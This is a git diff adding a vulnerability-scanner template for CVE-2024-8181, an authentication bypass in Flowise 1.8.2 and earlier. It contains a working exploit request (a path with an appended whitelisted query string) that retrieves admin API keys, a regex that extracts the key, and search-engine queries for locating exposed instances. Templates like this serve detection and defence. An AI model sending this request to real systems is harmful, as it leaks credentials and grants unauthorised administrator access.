diff --git a/http/cves/2024/CVE-2024-8181.yaml b/http/cves/2024/CVE-2024-8181.yaml new file mode 100644 index 0000000000..598518d6c5 --- /dev/null +++ b/http/cves/2024/CVE-2024-8181.yaml @@ -0,0 +1,58 @@ +id: CVE-2024-8181 + +info: + name: Flowise <= 1.8.2 Authentication Bypass + author: iamnoooob,rootxharsh,pdresearch + severity: high + description: | + An Authentication Bypass vulnerability exists in Flowise version 1.8.2. This could allow a remote, unauthenticated attacker to access API endpoints as an administrator and allow them to access restricted functionality. + reference: + - https://www.tenable.com/security/research/tra-2024-33 + - https://tenable.com/security/research/tra-2024-22-0 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N + cvss-score: 7.3 + cve-id: CVE-2024-8181 + epss-score: 0.00043 + epss-percentile: 0.09544 + metadata: + verified: true + max-request: 1 + shodan-query: http.favicon.hash:-2051052918 + fofa-query: title:"Flowise" + tags: tenable,cve,cve2024,flowise,auth-bypass + +http: + - raw: + - | + GET /api/v1/apikey?/api/v1/ping HTTP/1.1 + Host: {{Hostname}} + Accept: application/json, text/plain, */* + Referer: {{RootURL}}/document-stores + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "apiKey" + - "apiSecret" + condition: and + + - type: word + part: content_type + words: + - "application/json" + + - type: status + status: + - 200 + + extractors: + - type: regex + name: apiKey + part: body + internal: false + group: 1 + regex: + - '"apiKey":"([^"]+)"'